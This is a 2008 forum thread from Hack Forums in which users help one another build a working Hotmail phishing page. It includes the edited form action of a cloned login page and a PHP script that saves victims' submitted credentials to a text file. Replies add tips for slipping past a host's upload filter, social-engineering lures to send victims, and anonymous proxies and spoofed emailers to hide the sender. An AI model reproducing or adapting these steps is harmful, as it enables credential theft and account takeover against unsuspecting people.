Hack Forums

Hack Forums > Hacks, Exploits, and Various Discussions > AIM MSN IRC ICQ and IM Hacks > hotmail phish
Full Version: hotmail phish
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

darkillusions

07-10-2008, 03:53 PM
Does any here know how to actually phish hotmail?
Ive tried all the tuts on phishing, but no one could successfully explain how to make a working fake hotmail page.

I have, however, made a hotmail phish by referring to all the tuts I found here.


Here's how I did it:

pasted the source of login.live.com page in notepad and saved as index.php, and changed action="https://login.live.com/ppsecure/post.srf?bk=1215679129" to action=phish.php from here:
Code:
<form name="f1"       style="margin:0px;"       method="POST"       target="_top"       action="https://login.live.com/ppsecure/post.srf?bk=1215679129"     onsubmit="return OnSigninSubmit(this);">

Next I opened notepad and pasted the following:
Code:
<?php
header ('Location: http://login.live.com');
$handle = fopen("[b]passwords.txt[/b]", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
I saved this as phish.php

Then I created a txt file and saved it as passwords

So now I have have 3 files: index.php, phish.php and passwords.txt

I uploaded all to 110mb.com and when I try to open my fake login site it says webpage not found.

Then I registered with spam.com, and it couldnt upload phish.php and passwords.txt.

If anybody knows how to phish hotmail please tell me where I have gone wrong.

VipVince

07-10-2008, 03:59 PM
spam.com has become very strict against phising as most people with phising intentions are using t35 i noticed the other night uploading ''phish.php'' wouldnt work so i simply changed the name eg ''vipvince.php'' and it uploaded so it could be filtered against certain words like phish so just try renaming it before uploading.

zirian

07-10-2008, 04:07 PM
so if this works, what website url will you give to the victim or rather whats the next procedure after these steps work?

VipVince

07-10-2008, 04:13 PM
you give the login in page to make the person think they are signing in you can get the link changed on dot tk but that may be too advanced...so once you have your phisher made send them the login part...once they enter their details check your password.txt file and it should be there.

zirian

07-10-2008, 04:23 PM
VipVince Wrote:you give the login in page to make the person think they are signing in you can get the link changed on dot tk but that may be too advanced...so once you have your phisher made send them the login part...once they enter their details check your password.txt file and it should be there.

hmm... won't the victims I send the login page be suspicous as to why I am sending them a log in page? Also will the password.txt file be updated on t35 or on my own pc?

Thanks :yeye:

VipVince

07-10-2008, 04:30 PM
thats the whole point of a phisher...you send them a link the link being that of the login page then you tell them something like ''sign into this myspace (phisher login link) and check out my new pics'' or whatever you want.and yes as soon as they sign in the details will be stored on the password.txt file on the web host.id advise you to search google and learn about phishers..out of curiosity are you using a proxy while sending these cause a phisher can get you up to 15 years in prison dude.

zirian

07-10-2008, 04:41 PM
Well I don't know if I am, I am sure I do... I do however use cable internet and am behind a router... lol...

darkillusions

07-10-2008, 05:14 PM
Thanks for the quick reply VipVince. Im working on it. My net is slow, but Ill let you know the result when Im done.

zirian use an anonymouse proxy like youhide.com bro
and it would help if you mail the link to the victim using an anonymous emailer which can edit the sender's name. Thus you can send him mail from hotmail, yahoo, microsoft or whatever...

darkillusions

07-10-2008, 06:14 PM
VipVince thanks man it worked :D
I had to rename passwords.txt too.
At the moment I tried it on a forum, but I guess it would work on hotmal too. Ill try in awhile. Thanks again. Many users on this forum have wanted to know how to phish hotmail, and I guess this is where they all made the mistake too. You the man VipVince! Thanks again

zirian

07-10-2008, 07:40 PM
for some reason my activation on spam.com isn't working
Pages: 1 2
Hack Forums > Hacks, Exploits, and Various Discussions > AIM MSN IRC ICQ and IM Hacks > hotmail phish
Reference URL's